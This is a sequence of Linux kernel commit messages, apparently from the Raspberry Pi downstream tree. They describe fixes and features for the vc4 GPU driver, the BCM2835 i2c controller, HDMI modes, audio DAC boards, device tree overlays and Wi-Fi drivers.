* Added a writable sysfs object to enable scripts / user space software
to blink MIDI activity LEDs for variable duration.
* Improved hw_param constraints setting.
* Added compatibility with S16_LE sample format.
* Exposed some simple placeholder volume controls, so the card appears
in volumealsa widget.
Signed-off-by: Giedrius Trainavicius <giedrius@blokas.io>
[ Upstream commit 1bcaa05ebe ]
This reverts commit 18339f59c3 ("HID: dragonrise: fix HID...") because it
breaks certain dragonrise 0079:0006 gamepads. While it may fix a breakage
caused by commit 79346d620e ("HID: input: force generic axis to be mapped
to their user space axis"), it is probable that the manufacturer released
different hardware with the same PID so this fix works for only a subset
and breaks the other gamepads sharing the PID.
What is needed is another more generic solution which fixes 79346d620e
("HID: input: force generic axis ...") breakage for this controller: we
need to add an exception for this driver to make it keep the old behaviour
previous to the initial breakage (this is done in patch 2 of this series).
Signed-off-by: Ioan-Adrian Ratiu <adi@adirat.com>
Reviewed-by: Benjamin Tissoires <benjamin.tissoires@redhat.com>
Signed-off-by: Jiri Kosina <jkosina@suse.cz>
The i2c-sensor overlay is a container for various pressure and
temperature sensors, currently bmp085 and bmp280. The standalone
bmp085_i2c-sensor overlay is now deprecated.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
FS threading brings performance improvements of 0-20% in glmark2.
The validation code checks for thread switch signals and ensures that
the registers of the other thread are not touched, and that our clamps
are not live across thread switches. It also checks that the
threading and branching instructions do not interfere.
(Original patch by Jonas, changes by anholt for style cleanup,
removing validation the kernel doesn't need to do, and adding the flag
for userspace).
v2: Minor style fixes from checkpatch.
Signed-off-by: Jonas Pfeil <pfeiljonas@gmx.de>
Signed-off-by: Eric Anholt <eric@anholt.net>
(cherry picked from commit c778cc5df9)
The pm_runtime_put() we were using immediately released power on the
device, which meant that we were generally turning the device off and
on once per frame. In many profiles I've looked at, that added up to
about 1% of CPU time, but this could get worse in the case of frequent
rendering and readback (as may happen in X rendering). By keeping the
device on until we've been idle for a couple of frames, we drop the
overhead of runtime PM down to sub-0.1%.
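A minimal sketch of the autosuspend pattern this describes (illustrative
only, not the literal vc4 code; the 40 ms delay is a placeholder):

  /* at bind time: let the device linger before powering down */
  pm_runtime_use_autosuspend(dev);
  pm_runtime_set_autosuspend_delay(dev, 40);  /* ~a couple of frames */
  pm_runtime_enable(dev);

  /* when a job finishes, instead of pm_runtime_put(dev): */
  pm_runtime_mark_last_busy(dev);
  pm_runtime_put_autosuspend(dev);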
Signed-off-by: Eric Anholt <eric@anholt.net>
(cherry picked from commit 3a62234680)
The validation for it ends up being quite simple, but I hadn't got
around to it before merging the driver. For backwards compatibility,
we also need to add a flag so that the userspace GL driver can easily
tell if the kernel will allow ETC1 textures (on an old kernel, it will
continue to convert to RGBA8)
Signed-off-by: Eric Anholt <eric@anholt.net>
(cherry picked from commit 7154d76fed)
The loop is scanning until the original max_ip (size of the BO), but
we want to not examine any code after the PROG_END's delay slots.
There was a block trying to do that, except that we had some early
continue statements if the signal wasn't a PROG_END or a BRANCH.
The failure mode would be that a valid shader is rejected because some
undefined memory after the PROG_END slots is parsed as a branch and
the rest of its setup is illegal. I haven't seen this in the wild,
but valgrind was complaining about this in the userland simulator
mode.
Signed-off-by: Eric Anholt <eric@anholt.net>
(cherry picked from commit 457e67a728)
If the allocation fails the current code returns success. If
copy_from_user() fails it returns the number of bytes remaining instead
of -EFAULT.
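The usual idiom for both cases looks roughly like this (a sketch with
placeholder names, not the literal vc4 code):

  buf = kmalloc(size, GFP_KERNEL);
  if (!buf)
          return -ENOMEM;   /* previously fell through and returned 0 */

  if (copy_from_user(buf, user_ptr, size))
          return -EFAULT;   /* not the number of bytes left uncopied */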
Fixes: d5b1a78a77 ("drm/vc4: Add support for drawing 3D frames.")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Reviewed-by: Eric Anholt <eric@anholt.net>
(cherry picked from commit b2cdeb19f1)
This gets us normal 3D support on top of the existing firmware display
stack. There's no real modesetting support, no async pageflips
(hurting performance), etc., but it means that the desktop can at
least run until we get full native modesetting.
Signed-off-by: Eric Anholt <eric@anholt.net>
Now that we have infoframes to report the pixel repeat flag, we can
start using it. Fixes locking the 720x480i and 720x576i modes on my
Dell 2408WFP. Like the 1920x1080i case, they don't fit properly on
the screen, though.
Signed-off-by: Eric Anholt <eric@anholt.net>
Fixes a purple bar on the left side of the screen with my Dell
2408WFP. It will also be required for supporting the double-clocked
video modes.
Signed-off-by: Eric Anholt <eric@anholt.net>
We really do need to be using the halved V fields. I had been
confused by the code I was using as a reference because it stored
halved vsync fields but not halved vdisplay, so it looked like I only
needed to divide vdisplay by 2.
This reverts part of Mario's timestamping fixes that prevented
CRTC_HALVE_V from applying, and instead adjusts the timestamping code
to not use the crtc field in that case.
Fixes locking of 1920x1080x60i on my Dell 2408WFP. There are black
bars on the top and bottom, but I suspect that might be an
under/overscan flags problem as opposed to video timings.
Signed-off-by: Eric Anholt <eric@anholt.net>
Fixes occasional debug spew at boot when connected directly through
HDMI, and probably fixes confusing the HDMI state machine when we try
to poke registers for the enable sequence too soon.
Signed-off-by: Eric Anholt <eric@anholt.net>
On Pi0/1/2, we use an external GPIO line for hotplug detection, since
the HDMI_HOTPLUG register isn't connected to anything. However, with
the Pi3 the HPD GPIO line has moved off to a GPIO expander that will
be tricky to get to (the firmware is constantly polling the expander
using i2c0, so we'll need to coordinate with it).
As a stop-gap, if we don't have a GPIO line, use an EDID probe to
detect connection. Fixes HDMI display on the pi3.
Signed-off-by: Eric Anholt <eric@anholt.net>
Fixes broken grayscale ramps on many HDMI monitors, where large areas
at the ends of the ramp would all appear as black or white.
Signed-off-by: Eric Anholt <eric@anholt.net>
The combo of list_empty() check and return list_first_entry()
can be replaced with list_first_entry_or_null().
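For illustration (struct and field names are assumed, not quoted from
the driver):

  /* before */
  if (list_empty(&vc4->job_list))
          return NULL;
  return list_first_entry(&vc4->job_list, struct vc4_exec_info, head);

  /* after */
  return list_first_entry_or_null(&vc4->job_list, struct vc4_exec_info, head);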
Signed-off-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
This came from the initial bringup code, which always idled the GPU
and always reset the overflow. That massively increases the size of
the working set when you're doing lots of small draws, though, as is
common on X desktops or piglit.
Signed-off-by: Eric Anholt <eric@anholt.net>
Add missing drm_crtc_vblank_on/off() calls so vblank irq
handling/updating/timestamping never runs with a crtc shut down
or during its shutdown/startup, as that causes large jumps in
vblank count and trouble for compositors.
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
On top of the interlaced video mode fix and with some additional
adjustments, this now works well. It has almost the same accuracy
as on regular progressive scan modes.
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
We can't handle doublescan modes at the moment, so if
userspace tries to set one, reject the mode set.
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
We must not apply CRTC_INTERLACE_HALVE_V to interlaced modes during
mode enumeration, as drm_helper_probe_single_connector_modes
does, so wrap it and reset the effect of CRTC_INTERLACE_HALVE_V
on affected interlaced modes.
Also mode_fixup interlaced modes passed in from user space.
This fixes the vblank timestamping constants and entries in
the mode->crtc_xxx fields needed for precise vblank timestamping.
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
We already don't expose such modes to userspace, but make
sure userspace can't sneak some interlaced mode in.
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
The plane .prepare_fb() and .cleanup_fb() helpers are optional, there's
no need to implement empty stubs, and no need to explicitly set the
function pointers to NULL either.
Signed-off-by: Laurent Pinchart <laurent.pinchart+renesas@ideasonboard.com>
[danvet: Resolved conflicts with Chris' patch.]
Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch>
MIDI requires 31.25kbaud, a baudrate unsupported by Linux. The
midi-uart0 overlay configures uart0 (ttyAMA0) to use a fake clock
so that requesting 38.4kbaud actually gets 31.25kbaud.
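The trick works because the pl011 divisor is computed from the clock
rate the driver is told about; a sketch of the arithmetic (an assumption
about the mechanism, not code from the overlay):

  /* report a clock 38400/31250 (= 1.2288) times the real rate, so a
   * divisor calculated for 38.4 kbaud gives 31.25 kbaud on the wire */
  unsigned long fake_rate = real_rate * 38400 / 31250;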
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Format ioctls:
test VIDIOC_ENUM_FMT/FRAMESIZES/FRAMEINTERVALS: OK
warn: v4l2-test-formats.cpp(1195): S_PARM is supported but
doesn't report V4L2_CAP_TIMEPERFRAME.
fail: v4l2-test-formats.cpp(1118): node->has_frmintervals
&& !cap->capability
Applying to the audioinjector sound card only. This patch offsets channel
2 correctly from the LR clock. This ensures that channel 2 doesn't lose
any bits during capture. It also results in both channels 1 and 2 having
the same volume. This commit also adds 8 kHz operation.
Signed-off-by: Matt Flax <flatmax@flatmax.org>
With the death of ARCH_BCM2708 and ARCH_BCM2709, a new way is needed to
determine if this is a "downstream" build that wants the firmware to
load a bcm27xx .dtb. The vc_cma driver is used downstream but not
upstream, making vc_cma_init a suitable predicate symbol.
They are not necessary anymore since both are based on ARCH_BCM2835.
Also use the compatible strings "brcm,bcm2835", "brcm,bcm2836" and "brcm,bcm2837".
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Fixes setting low-resolution video modes on HDMI. Now the PLLH_PIX
divider adjusts itself until the PLLH is within bounds.
Signed-off-by: Eric Anholt <eric@anholt.net>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
This adds a debug module parameter to aid in debugging transfer issues
by printing info to the kernel log. When enabled, status values are
collected in the interrupt routine and msg info in
bcm2835_i2c_start_transfer(). This is done in a way that tries to avoid
affecting timing. Having printk in the isr can mask issues.
debug values (additive):
1: Print info on error
2: Print info on all transfers
3: Print messages before transfer is started
The value can be changed at runtime:
/sys/module/i2c_bcm2835/parameters/debug
Example output, debug=3:
[ 747.114448] bcm2835_i2c_xfer: msg(1/2) write addr=0x54, len=2 flags= [i2c1]
[ 747.114463] bcm2835_i2c_xfer: msg(2/2) read addr=0x54, len=32 flags= [i2c1]
[ 747.117809] start_transfer: msg(1/2) write addr=0x54, len=2 flags= [i2c1]
[ 747.117825] isr: remain=2, status=0x30000055 : TA TXW TXD TXE [i2c1]
[ 747.117839] start_transfer: msg(2/2) read addr=0x54, len=32 flags= [i2c1]
[ 747.117849] isr: remain=32, status=0xd0000039 : TA RXR TXD RXD [i2c1]
[ 747.117861] isr: remain=20, status=0xd0000039 : TA RXR TXD RXD [i2c1]
[ 747.117870] isr: remain=8, status=0x32 : DONE TXD RXD [i2c1]
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Support a dynamic clock by reading the frequency and setting the
divisor in the transfer function instead of during probe.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Martin Sperl <kernel@martin.sperl.org>
Use i2c_adapter->timeout for the completion timeout value. The core
default is 1 second.
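Sketch of the pattern (names illustrative):

  time_left = wait_for_completion_timeout(&i2c_dev->completion,
                                          adap->timeout);
  if (!time_left)
          return -ETIMEDOUT;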
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
Documentation/i2c/i2c-protocol states that Combined transactions should
separate messages with a Start bit and end the whole transaction with a
Stop bit. This patch adds support for issuing only a Start between
messages instead of a Stop followed by a Start.
This implementation differs from downstream i2c-bcm2708 in 2 respects:
- it uses an interrupt to detect that the transfer is active instead
of using polling. There is no interrupt for Transfer Active, but by
not prefilling the FIFO it's possible to use the TXW interrupt.
- when resetting/disabling the controller between transfers it writes
CLEAR to the control register instead of just zero.
Using just zero gave many errors. This might be the reason why
downstream had to disable this feature and make it available with a
module parameter.
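Roughly, the reset between transfers described above becomes (register
and macro names follow the datasheet/driver but are shown only as an
illustration, not the exact code):

  /* disable the controller (I2CEN=0) and clear the FIFO in one write,
   * rather than writing plain zero */
  writel(BCM2835_I2C_C_CLEAR, i2c_dev->regs + BCM2835_I2C_C);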
I have run thousands of transfers to a DS1307 (rtc), MMA8451 (accel)
and AT24C32 (eeprom) in parallel without problems.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Acked-by: Eric Anholt <eric@anholt.net>
The controller can't support this flag, so remove it.
Documentation/i2c/i2c-protocol states that all of the message is sent:
I2C_M_IGNORE_NAK:
Normally message is interrupted immediately if there is [NA] from the
client. Setting this flag treats any [NA] as [A], and all of
message is sent.
From the BCM2835 ARM Peripherals datasheet:
The ERR field is set when the slave fails to acknowledge either
its address or a data byte written to it.
So when the controller doesn't receive an ack, it sets ERR and raises
an interrupt. In other words, the whole message is not sent.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
Writing to an AT24C32 generates on average 2x i2c transfer errors per
32-byte page write. Which amounts to a lot for a 4k write. This is due
to the fact that the chip doesn't respond during its internal write
cycle when the at24 driver tries and retries the next write.
Only a handful of drivers use dev_err() on transfer error, so switch to
dev_dbg() instead.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
If an unexpected TXW or RXR interrupt occurs (msg_buf_remaining == 0),
the driver has no way to fill/drain the FIFO to stop the interrupts.
In this case the controller has to be disabled and the transfer
completed to avoid hang.
(CLKT | ERR) and DONE interrupts are completed in their own paths, and
the controller is disabled in the transfer function after completion.
Unite the code paths and do disabling inside the interrupt routine.
Clear interrupt status bits in the united completion path instead of
trying to do it on every interrupt which isn't necessary.
Only CLKT, ERR and DONE can be cleared that way.
Add the status value to the error value in case of TXW/RXR errors to
distinguish them from the other S_LEN error.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
Writing messages larger than the FIFO size results in a hang, rendering
the machine unusable. This is because the RXD status flag is set on the
first interrupt which results in bcm2835_drain_rxfifo() stealing bytes
from the buffer. The controller continues to trigger interrupts waiting
for the missing bytes, but bcm2835_fill_txfifo() has none to give.
In this situation wait_for_completion_timeout() apparently is unable to
stop the madness.
The BCM2835 ARM Peripherals datasheet has this to say about the flags:
TXD: is set when the FIFO has space for at least one byte of data.
RXD: is set when the FIFO contains at least one byte of data.
TXW: is set during a write transfer and the FIFO is less than ¼ full.
RXR: is set during a read transfer and the FIFO is ¾ or more full.
Implementing the logic from the downstream i2c-bcm2708 driver solved
the hang problem.
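In outline, the interrupt handler then keys off TXW/RXR/DONE instead of
the raw TXD/RXD flags (a simplified sketch using the helper names
mentioned above; not the complete handler):

  if (status & BCM2835_I2C_S_DONE) {
          if (i2c_dev->curr_msg->flags & I2C_M_RD)
                  bcm2835_drain_rxfifo(i2c_dev);
          complete(&i2c_dev->completion);
  } else if (status & BCM2835_I2C_S_TXW) {
          bcm2835_fill_txfifo(i2c_dev);
  } else if (status & BCM2835_I2C_S_RXR) {
          bcm2835_drain_rxfifo(i2c_dev);
  }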
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
Reviewed-by: Martin Sperl <kernel@martin.sperl.org>
The raspberrypi-power driver is now used to turn on USB power.
This partly reverts commit:
firmware: bcm2835: Support ARCH_BCM270x
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
This file doesn't build anymore and isn't used so remove it.
It was added as part of my ARCH_BCM2835 work last year, but the future
didn't pan out as expected.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Drop NEED_MACH_MEMORY_H and use dma-ranges from the Device Tree to
get the bus address, like ARCH_BCM2835 does.
This means that we go from this:
arch/arm/mach-bcm270x/include/mach/memory.h:
#define __virt_to_bus(x) ((x) + (BUS_OFFSET - PAGE_OFFSET))
#define __bus_to_virt(x) ((x) - (BUS_OFFSET - PAGE_OFFSET))
#define __pfn_to_bus(x) (__pfn_to_phys(x) + BUS_OFFSET)
#define __bus_to_pfn(x) __phys_to_pfn((x) - BUS_OFFSET)
To this:
arch/arm/include/asm/memory.h:
#define __virt_to_bus __virt_to_phys
#define __bus_to_virt __phys_to_virt
#define __pfn_to_bus(x) __pfn_to_phys(x)
#define __bus_to_pfn(x) __phys_to_pfn(x)
Drivers now have to use the DMA API to get to the bus address.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
This makes it possible to get the bus address from Device Tree.
At the same time move the call to log_init() after getting the clock
to avoid allocating twice due to deferred probing.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
NEED_MACH_IO_H isn't necessary since we don't have
PC card/PCI/ISA IO space.
The __io macro is only used in the {in,out}[bwl] macros.
arch/arm/include/asm/io.h will give these defaults now:
#define __io(a) __typesafe_io((a) & IO_SPACE_LIMIT)
#define IO_SPACE_LIMIT ((resource_size_t)0)
This is the same as ARCH_BCM2835.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
1. Enable emulation of deprecated instructions.
2. Enable ARM 8.1 and 8.2 features which are not detected at runtime.
3. Switch the default governor to powersave.
4. Include the watchdog timer driver in the kernel image rather than a module.
Tested with raspbian-jessie 2016-09-23.
so that special/critical clocks can get enabled early on
in the boot process, avoiding the risk of disabling a clock,
pll_divider or pll when a claiming driver fails to install
properly - maybe it needs to defer.
Signed-off-by: Martin Sperl <kernel@martin.sperl.org>
All drivers map their own io now so it's not necessary to do this
mapping anymore. The mapping for the uart debug console is handled by
debug_ll_io_init() if necessary.
Remove local uart debug code and rely on mainline.
Use these kconfig options to enable:
CONFIG_DEBUG_BCM2835
CONFIG_DEBUG_BCM2836
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Drop the call to init_dma_coherent_pool_size(). The default 256kB is
enough since vchiq dropped that atomic allocation some time back.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
include/mach/vmalloc.h has not been used since 2011.
include/mach/entry-macro.S is leftover from the move to the mainline
irq driver.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
The watchdog driver already has support for reboot/poweroff.
Make use of this and remove the code from the platform files.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
The Raspberry Pi firmware looks at the RSTS register to know which
partition to boot from. The reboot syscall command
LINUX_REBOOT_CMD_RESTART2 supports passing in a string argument.
Add support for passing in a partition number 0..63 to boot from.
Partition 63 is a special partition indicating halt.
If the partition doesn't exist, the firmware falls back to partition 0.
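A sketch of the argument handling this implies (the helper is
hypothetical and the RSTS bit encoding is omitted):

  u8 partition = 0;

  /* cmd is the string passed via LINUX_REBOOT_CMD_RESTART2 */
  if (cmd && !kstrtou8(cmd, 10, &partition) && partition <= 63)
          bcm2835_set_rsts_partition(partition);  /* hypothetical helper */
  /* partition 63 tells the firmware to halt instead of rebooting */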
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
The mainline Device Tree files are quite close to downstream now.
Let's use bcm283x.dtsi, bcm2835.dtsi and bcm2836.dtsi as base files
for our dts files.
Mainline dts files are based on these files:
bcm2835-rpi.dtsi
bcm2835.dtsi bcm2836.dtsi
bcm283x.dtsi
Current downstream are based on these:
bcm2708.dtsi bcm2709.dtsi bcm2710.dtsi
bcm2708_common.dtsi
This patch introduces this dependency:
bcm2708.dtsi bcm2709.dtsi
bcm2708-rpi.dtsi
bcm270x.dtsi
bcm2835.dtsi bcm2836.dtsi
bcm283x.dtsi
And:
bcm2710.dtsi
bcm2708-rpi.dtsi
bcm270x.dtsi
bcm283x.dtsi
bcm270x.dtsi contains the downstream bcm283x.dtsi diff.
bcm2708-rpi.dtsi is the downstream version of bcm2835-rpi.dtsi.
Other changes:
- The led node has moved from /soc/leds to /leds. This is not a problem
since the label is used to reference it.
- The clk_osc reg property changes from 6 to 3.
- The gpu nodes have their interrupt property set in the base file.
- the clocks label does not point to the /clocks node anymore, but
points to the cprman node. This is not a problem since the overlays
that use the clock node refer to it directly: target-path = "/clocks";
- some nodes now have 2 labels since mainline and downstream differ in
this respect: cprman/clocks, spi0/spi, gpu/vc4.
- some nodes don't have an explicit status = "okay" since they're not
disabled in the base file: watchdog and random.
- gpiomem doesn't need an explicit status = "okay".
- bcm2708-rpi-cm.dts got the hpd-gpios property from bcm2708_common.dtsi;
it's now set directly in that file.
- bcm2709-rpi-2-b.dts has the timer node moved from /soc/timer to /timer.
- Removed clock-frequency property on the bcm{2709,2710}.dtsi timer nodes.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
irq-bcm2836 handles this through these functions:
bcm2835_init_local_timer_frequency()
bcm2836_arm_irqchip_smp_init()
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Kernel 4.4.6+ on the Raspberry Pi supports .dtbo files for overlays, instead of .dtb.
Patch the kernel, which has faulty rules for generating .dtbo files the way yocto does.
Signed-off-by: Herve Jourdain <herve.jourdain@neuf.fr>
Signed-off-by: Khem Raj <raj.khem@gmail.com>
The old "of_overlay_apply" string does not appear in 4.8 kernel builds.
"of_cfs_init" is both present and a more accurate indication of support
for dynamically loading overlays (although the trailer is now of little
practical use and the firmware assumes DT support and will look for
both .dtbo and -overlay.dtb overlays).
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
There is some evidence that disabling roaming cures disconnects, so make it the default.
It can be overridden with the module parameter roamoff=0
See: http://projectable.me/optimize-my-pi-wi-fi/
Commit 73345fd212:
brcmfmac: Configure country code using device specific settings
prevents region codes from working on devices that lack a region code
translation table. In the event of an absent table, preserve the old
behaviour of using the provided code as-is.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Disable wireless power saving in the brcmfmac WLAN driver. This is a
temporary measure until the connectivity loss resulting from power
saving is resolved.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
This is a port of Pantelis Antoniou's v3 port that makes use of the
new upstreamed configfs support for binary attributes.
Original commit message:
Add a runtime interface to using configfs for generic device tree overlay
usage. With it it's possible to use device tree overlays without having
to use a per-platform overlay manager.
Please see Documentation/devicetree/configfs-overlays.txt for more info.
Changes since v2:
- Removed ifdef CONFIG_OF_OVERLAY (since for now it's required)
- Created a documentation entry
- Slight rewording in Kconfig
Changes since v1:
- of_resolve() -> of_resolve_phandles().
Originally-signed-off-by: Pantelis Antoniou <pantelis.antoniou@konsulko.com>
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
DT configfs: Fix build errors on other platforms
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
DT configfs: fix build error
There is an error when compiling rpi-4.6.y branch:
CC drivers/of/configfs.o
drivers/of/configfs.c:291:21: error: initialization from incompatible pointer type [-Werror=incompatible-pointer-types]
.default_groups = of_cfs_def_groups,
^
drivers/of/configfs.c:291:21: note: (near initialization for 'of_cfs_subsys.su_group.default_groups.next')
The .default_groups is a linked list since commit
1ae1602de0.
This commit uses configfs_add_default_group to fix this problem.
Signed-off-by: Slawomir Stepien <sst@poczta.fm>
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
suppress spurious messages
Add #if for 3.14 kernel change (#87)
Fixes compiling after changes in f663dd9aaf and 99932d4fc0. Fixes #86
Set dev_type to wlan
Fixes #23
Tentatively added support for more 8188CUS based devices.
Add support for more 8188CUS and 8192CUS devices
Add ProductId for the Netgear N150 - WNA1000M
Fixes CONFIG_CONCURRENT_MODE CONFIG_MULTI_VIR_IFACES
Fixes compatibility with 3.13
Enables warnings in the compiler and fixes some issues, reference => https://github.com/diederikdehaas/rtl8812AU
Starts device in station mode instead of monitor, fixes NetworkManager issues
Enable cfg80211 support
Fix cfg80211 for kernel >= 4.7
Fixes rtl8192cu for kernel >= 4.8
Add non-mainline source for rtl8192cu wireless driver version v4.0.2_9000 as
this is widely used. Disable older rtlwifi driver.
8192cu needs old wireless extensions
The obsolete WIRELESS_EXT configuration is used
by the old Realtek code and is needed for AP support.
8192cu: CONFIG_AP_MODE hardcoded in autoconf.h
rtl8192c_rf6052: PHY_RFShadowRefresh(): fix off-by-one
Signed-off-by: Marc Kleine-Budde <mkl@blackshift.org>
rtl8192cu: Add PID for D-Link DWA 131
The pl011 driver looks for DT aliases of the form "serial<n>",
and if found uses <n> as the device ID. This can cause
/dev/ttyAMA0 to become /dev/ttyAMA1, which is confusing if the
other serial port is provided by the 8250 driver which doesn't
use the same logic.
Add a mailbox-driven backlight controller for the Raspberry Pi DSI
touchscreen display. Requires updated GPU firmware to recognise the
mailbox request.
Signed-off-by: Gordon Hollingworth <gordon@raspberrypi.org>
Add initial 2 channel (stereo) support for Allo Piano DAC (2.0/2.1) boards,
using allo-piano-dac-pcm512x-audio overlay and allo-piano-dac ALSA ASoC
machine driver.
NB. The initial support is 2 channel (stereo) ONLY!
(The Piano DAC 2.1 will only support 2 channel (stereo) left/right output,
pending an update to the upstream pcm512x codec driver, which will have
to be submitted via upstream. With the initial downstream support,
provided by this patch, the Piano DAC 2.1 subwoofer outputs will
not function.)
Signed-off-by: Baswaraj K <jaikumar@cem-solutions.net>
Signed-off-by: Clive Messer <clive.messer@digitaldreamtime.co.uk>
Tested-by: Clive Messer <clive.messer@digitaldreamtime.co.uk>
Support IQAudIO Digi board with iqaudio_digi machine driver and
iqaudio-digi-wm8804-audio overlay.
NB. Machine driver is a cut and paste of hifiberry_digi code, with format
and general cleanup to comply with kernel coding standards.
Signed-off-by: DigitalDreamtime <clive.messer@digitaldreamtime.co.uk>
Contains the sound/soc/bcm ALSA machine driver and necessary alterations to the Kconfig and Makefile.
Adds the dts overlay and updates the Makefile and README.
Updates the relevant defconfig files to enable building for the Raspberry Pi.
Thanks to Phil Elwell (pelwell) for the review, simple-card concepts and discussion. Thanks to Clive Messer for overlay naming suggestions.
Added support for headphones, microphone and bclk_ratio settings.
This patch adds headphone and microphone capability to the Audio Injector
sound card. The patch also sets the bit clock ratio for use in the
bcm2835-i2s driver. The bcm2835-i2s driver can't handle an 8 kHz sample
rate when the bit clock is at 12 MHz because its register is only 10 bits
wide, which can't represent the ch2 offset of 1508. For that reason, the
rate constraint is added.
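For illustration, the bclk_ratio part of the machine driver looks roughly
like this (the function name and the ratio value are assumptions, not the
actual driver code):

  static int audioinjector_pi_hw_params(struct snd_pcm_substream *substream,
                                        struct snd_pcm_hw_params *params)
  {
          struct snd_soc_pcm_runtime *rtd = substream->private_data;

          /* tell bcm2835-i2s how many bit clocks to generate per frame */
          return snd_soc_dai_set_bclk_ratio(rtd->cpu_dai, 64);
  }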
This commit adds basic support for using the codec, including: Device Tree
overlay, binding the I2S bus and setting the I2S mode, and setting the clock
source and frequency according to spec.
Signed-off-by: Andrey Grodzovsky <andrey2805@gmail.com>
justboom-dac: Adjust for ALSA API change
As of 4.4, snd_soc_limit_volume now takes a struct snd_soc_card *
rather than a struct snd_soc_codec *.
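i.e. (the control name and limit value here are illustrative):

  /* 4.3 and earlier */
  snd_soc_limit_volume(codec, "Digital Playback Volume", 207);

  /* 4.4 and later */
  snd_soc_limit_volume(card, "Digital Playback Volume", 207);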
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Signed-off-by: Jan Grulich <jan@grulich.eu>
config: fix RaspiDAC Rev.3x dependencies
Change depends to SND_BCM2708_SOC_I2S || SND_BCM2835_SOC_I2S
like the other I2S soundcard drivers.
Signed-off-by: Matthias Reichl <hias@horus.com>
The driver contains a low-level hardware driver for the TAS5713 and the
drivers for the Raspberry Pi I2S subsystem.
TAS5713: return error if initialisation fails
Existing TAS5713 driver logs errors during initialisation, but does not return
an error code. Therefore even if initialisation fails, the driver will still be
loaded, but won't work. This patch fixes this. I2C communication errors will
now be reported correctly by a non-zero return code.
HiFiBerry Amp: fix device-tree problems
Some code to load the driver based on device-tree-overlays was missing. This is added by this patch.
The driver is based on the HiFiBerry DAC driver. However HiFiBerry DAC+ uses
a different codec chip (PCM5122), therefore a new driver is necessary.
Add support for the HiFiBerry DAC+ Pro.
The HiFiBerry DAC+ and DAC+ Pro products both use the existing bcm sound
driver, with the DAC+ Pro having a special clock device driver representing
the two high precision oscillators.
An additional bug fix is included for the PCM512x codec, whereby the physical
size of the sample frame is used in the calculation of the LRCK divisor, as it
was found to be wrong when using a 24-bit depth sample contained in a
little-endian 4-byte sample frame.
Limit PCM512x "Digital" gain to 0dB by default with HiFiBerry DAC+
24db_digital_gain DT param can be used to specify that PCM512x
codec "Digital" volume control should not be limited to 0dB gain,
and if specified will allow the full 24dB gain.
Add dt param to force HiFiBerry DAC+ Pro into slave mode
"dtoverlay=hifiberry-dacplus,slave"
Add 'slave' param to use HiFiBerry DAC+ Pro in slave mode,
with Pi as master for bit and frame clock.
Signed-off-by: DigitalDreamtime <clive.messer@digitaldreamtime.co.uk>
Set a limit of 0dB on Digital Volume Control
The main volume control in the PCM512x DAC has a range up to
+24dB. This is dangerously loud and can potentially cause massive
clipping in the output stages. Therefore this sets a sensible
limit of 0dB for this control.
Allow up to 24dB digital gain to be applied when using IQAudIO DAC+
24db_digital_gain DT param can be used to specify that PCM512x
codec "Digital" volume control should not be limited to 0dB gain,
and if specified will allow the full 24dB gain.
Modify IQAudIO DAC+ ASoC driver to set card/dai config from dt
Add the ability to set the card name, dai name and dai stream name, from
dt config.
Signed-off-by: DigitalDreamtime <clive.messer@digitaldreamtime.co.uk>
IQaudIO: auto-mute for AMP+ and DigiAMP+
IQAudIO amplifier mute via GPIO22. Add dt params for "one-shot" unmute
and auto mute.
Revision 2, auto mute implementing HiassofT suggestion to mute/unmute
using set_bias_level, rather than startup/shutdown....
"By default DAPM waits 5 seconds (pmdown_time) before shutting down
playback streams so a close/stop immediately followed by open/start
doesn't trigger an amp mute+unmute."
Tested on both AMP+ (via DAC+) and DigiAMP+, with both options...
dtoverlay=iqaudio-dacplus,unmute_amp
"one-shot" unmute when kernel module loads.
dtoverlay=iqaudio-dacplus,auto_mute_amp
